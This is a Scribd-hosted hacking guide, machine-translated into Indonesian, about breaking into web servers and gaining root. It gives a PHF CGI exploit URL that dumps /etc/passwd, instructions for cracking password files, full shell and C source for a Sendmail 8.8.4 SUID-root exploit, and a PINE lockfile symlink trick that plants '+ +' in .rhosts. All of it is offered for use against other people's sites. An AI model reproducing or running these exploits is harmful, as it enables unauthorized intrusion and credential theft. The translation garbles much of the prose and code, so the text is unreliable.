0% menganggap dokumen ini bermanfaat (0 suara)
97 tayangan6 halaman

Hacking Webpage

Diunggah oleh

chepimanca
Hak Cipta
© Attribution Non-Commercial (BY-NC)
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOCX, PDF, TXT atau baca online di Scribd
0% menganggap dokumen ini bermanfaat (0 suara)
97 tayangan6 halaman

Hacking Webpage

Diunggah oleh

chepimanca
Hak Cipta
© Attribution Non-Commercial (BY-NC)
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai DOCX, PDF, TXT atau baca online di Scribd
Anda di halaman 1/ 6

Hacking Webpage - The Ultimate

panduan

  Pengarang: Virtual Circuit dan Psychotic

  Well Psychotic menulis salah satu yang paling bermanfaat unix file teks di dunia maya tetapi dengan
mail yang kita

  diterima setelah rilis halaman 36 kami yang terkenal Unix Alkitab kita menyadari bahwa unix ini bukan
untuk semua orang begitu

  kami memutuskan bahwa kita harus menulis pada aspek lain dari hacking ..... Virtual Circuit dan bangga
Psychotic   release, "Hacking Halaman Web Dengan beberapa Teknik lain." Kita akan membahas
beberapa berbagai cara hacking   halaman Web dan mendapatkan akar. Kami juga akan mewawancarai
dan pertanyaan REAL hacker lainnya di   pelajaran.   Mendapatkan Password Melalui FTP File   Ok juga
salah satu cara termudah mendapatkan akses superuser adalah melalui anonymous ftp akses ke   web.
Pertama anda perlu belajar sedikit tentang file password ...

  root: User: d7Bdg: 1n2HG2: 1127:20: Superuser

  TomJones: p5Y (h0tiC: 1229:20: Tom Jones,: / usr / orang / tomjones: / bin / csh   BBob:
EUyd5XAAtv2dA: 1129:20: Billy Bob: / usr / orang / bbob: / bin / csh   Ini merupakan contoh password
file yang terenkripsi. The Superuser adalah bagian yang memberikan anda root.   Itulah bagian utama
dari file.

  root: x: 0:1: Superuser: /:

  ftp:x:202:102:Anonymous ftp:/u1/ftp:

  ftpadmin: x: 203:102: ftp Administrator: / u1/ftp

  Ini adalah contoh lain dari file password, hanya yang satu ini memiliki satu perbedaan kecil, itu gelap.
Shadowed file password tidak membiarkan Anda melihat atau menyalin kata sandi terenkripsi yang
sebenarnya. Hal ini menyebabkan masalah   untuk memasukkan sandi pembuat kerupuk dan kamus
(keduanya dijelaskan nanti dalam teks). Di bawah ini adalah lain

  contoh file password gelap:

  root: x :0:1:0000-Admin (0000 ):/:/ usr / bin / csh

  daemon: x :1:1:0000-Admin (0000): /:

  bin: x :2:2:0000-Admin (0000): / usr / bin:


  sys: x :3:3:0000-Admin (0000): /:

  adm: x :4:4:0000-Admin (0000): / var / adm:

  lp: x :71:8:0000-lp (0000): / usr / spool / lp:

  smtp: x: 0:0: mail daemon user: /:

  uucp: x :5:5:0000-uucp (0000): / usr / lib / uucp:

  nuucp: x :9:9:0000-uucp (0000): / var / spool / uucppublic: / usr / lib / uucp / uucico

  mendengarkan: x: 37:4: Network Admin: / usr / net / nls:

  nobody: x: 60001:60001: uid no body: /:

  noaccess: x: 60002:60002: uid no access: /:

  webmastr: x: 53:53: WWW Admin: / export / home / webmastr: / usr / bin / csh

  pin4geo: x: 55:55: PinPaper Admin: / export/home/webmastr/new/gregY/test/pin4geo: / bin / false

  ftp:x:54:54:Anonymous FTP: / export / home / anon_ftp: / bin / false

  Shadowed password file memiliki "x" di tempat password atau kadang-kadang mereka menyamar
sebagai

  * Juga.

  Sekarang Anda tahu sedikit lebih banyak tentang apa yang sebenarnya file password Sepertinya Anda
harus dapat

  mengidentifikasi dienkripsi normal pw dari file pw gelap. Kita sekarang dapat melanjutkan untuk
berbicara tentang bagaimana untuk memecahkannya.

  Cracking file password tidak serumit itu akan tampak, walaupun file sistem bervariasi dari   sistem.
1.The langkah pertama yang akan Anda ambil adalah untuk men-download atau menyalin file. 2.
Langkah kedua adalah untuk menemukan

  password cracker dan dictionary maker. Meskipun hampir tidak mungkin untuk menemukan kerupuk
yang baik di sana

  adalah beberapa yang ok di luar sana. Saya sarankan Anda mencari Cracker Jack, John the Ripper, Brute
Force
  Cracker, atau Jack the Ripper. Sekarang untuk dictionary maker atau dictionary file ... Ketika Anda mulai
retak
  prog Anda akan diminta untuk mencari file password. Itu tempat pembuat kamus masuk Anda dapat
  download salah satu dari hampir setiap halaman hacker di net. Seorang pembuat kamus menemukan
semua surat yang mungkin

  kombinasi dengan alfabet yang Anda pilih (ASCII, topi, huruf kecil, dan angka surat juga mungkin

  ditambahkan). Kami akan merilis pasword kita file ke publik segera, itu akan disebut, Psychotic Candy,
"The
  Perfect Drug. "Sejauh yang kami tahu itu akan menjadi salah satu yang terbesar di sirkulasi. 3. Anda
kemudian mulai mendaki

  kerupuk dan ikuti petunjuk yang memberikan anda.

  The PHF Teknik

  Yah aku tidak yakin apakah aku harus menyertakan bagian ini karena fakta bahwa semua orang sudah
tahu itu dan

  kebanyakan server sudah mengetahui tentang bug dan fixed it. Tapi karena saya telah mengajukan
pertanyaan
  tentang PHF saya memutuskan untuk memasukkannya.

  The PHF Teknik sejauh ini merupakan cara termudah untuk mendapatkan file password (meskipun
tidak bekerja 95% dari

  waktu). Tetapi untuk melakukan PHF semua yang Anda lakukan adalah membuka browser dan ketik
link berikut ini:

  http://webpage_goes_here/cgi-bin/phf?Qalias=x% 0a/bin/cat% 20/etc/passwd

  Anda mengganti webpage_goes_here dengan domain. Jadi, jika Anda mencoba untuk mendapatkan file
pw

  www.webpage.com anda sekarang perlu mengetikkan:

  http://www.webpage.com/cgi-bin/phf?Qalias=x% 0a/bin/cat% 20/etc/passwd

  dan hanya itu! Anda hanya duduk dan salin file (jika bekerja).

  Telnet dan Exploits

  Yah memanfaatkan adalah cara terbaik untuk halaman web hacking, tetapi mereka juga lebih rumit
kemudian hacking

  melalui ftp atau menggunakan PHF. Sebelum Anda dapat setup suatu mengeksploitasi Anda harus
terlebih dahulu memiliki proggie telnet, ada
  banyak klien yang berbeda Anda dapat saja melakukan netsearch dan menemukan semua yang anda
butuhkan.
  Itu terbaik untuk mendapatkan account dengan target Anda (jika mungkin) dan melihat Glitches dari
dalam ke luar. Exploits

  mengekspos kesalahan atau bug dalam sistem dan biasanya memungkinkan Anda untuk mendapatkan
akses root. Ada banyak

  eksploitasi sekitar dan Anda dapat melihat masing-masing secara terpisah. Aku akan daftar beberapa di
bawah ini tapi daftar eksploitasi adalah

  habisnya.

  Mengeksploitasi ini dikenal sebagai Sendmail v.8.8.4

  Ini menciptakan program SUID / tmp / x yang memanggil shell sebagai root. Ini adalah bagaimana anda
mengaturnya:

  cat <<_EOF_> / tmp / x.c

  # define RUN "/ bin / ksh"

  # include

  main ()

  (

  execl (RUN, RUN, NULL);

  )
  _EOF_

  #

  cat <<_EOF_> / tmp / spawnfish.c

  main ()

  (
  execl ( "/ usr / lib / sendmail", "/ tmp / smtpd", 0);

  )

  _EOF_

  #
  cat <<_EOF_> / tmp / smtpd.c
  main ()

  (
  setuid (0); setgid (0);

  system ( "chown root / tmp / x; chmod 4755 / tmp / x");

  )

  _EOF_

  #

  #

  gcc-O-o / tmp / x / tmp / x.c

  gcc-O3-o / tmp / spawnfish / tmp / spawnfish.c

  gcc-O3-o / tmp / smtpd / tmp / smtpd.c

  #
  / tmp / spawnfish

  membunuh-HUP `/ usr / UCB / ps-ax | grep / tmp / smtpd | grep-v grep | sed s /" []*"// | cut-d ""-f1 `

  rm / tmp / spawnfish.c / tmp / spawnfish / tmp / smtpd.c / tmp / smtpd / tmp / xc

  sleep 5

  if [-u / tmp / x]; kemudian

  echo "Leet ..."

  / tmp / x

  fi

  dan sekarang pada mengeksploitasi lain. Aku akan menampilkan mengeksploitasi pinus melalui linux.
Dengan mengamati

  tabel proses dengan ps untuk melihat mana pengguna sedang menjalankan PINUS, seseorang dapat
melakukan ls di / tmp / untuk mengumpulkan

  Lockfile nama-nama bagi setiap pengguna. Melihat tabel sekali lagi proses sekarang akan
mengungkapkan ketika setiap pengguna berhenti

  PINE atau kehabisan pesan yang belum dibaca dalam INBOX, secara efektif menghapus Lockfile masing-
masing.
  Menciptakan symlink dari / tmp / .hamors_lockfile ke ~ hamors / .rhosts (untuk contoh umum) akan

  menyebabkan PINE membuat ~ hamors / .rhosts sebagai file 666 dengan PINE proses id itu sebagai
isinya. Satu mungkin sekarang

  hanya melakukan echo "+ +"> / tmp / .hamors_lockfile, lalu rm / tmp / .hamors_lockfile.

Anda mungkin juga menyukai